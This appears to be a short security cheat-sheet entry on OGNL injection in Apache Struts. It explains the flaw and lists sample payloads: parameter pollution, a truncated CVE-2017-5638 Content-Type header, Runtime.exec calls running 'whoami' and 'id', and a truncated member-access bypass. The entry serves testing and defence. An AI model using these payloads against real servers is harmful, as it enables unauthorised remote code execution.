OGNL Injection is a code injection vulnerability targeting applications that use Object-Graph Navigation Language (OGNL), particularly Apache Struts. Attackers can inject OGNL expressions to access and manipulate Java objects, leading to remote code execution.
OGNL is an expression language used to get and set properties of Java objects. When user input is evaluated as OGNL expressions without proper sanitization, attackers can traverse object graphs and invoke arbitrary methods.
# Struts 2 action parameter pollution
http://target/action?name=${expression}
# Content-Type manipulation (CVE-2017-5638)
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']...}# Access static methods
@java.lang.Runtime@getRuntime().exec('whoami')
# Execute commands via ProcessBuilder
(#rt=@java.lang.Runtime@getRuntime()).(#rt.exec('id'))
# Struts2 classic payload
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}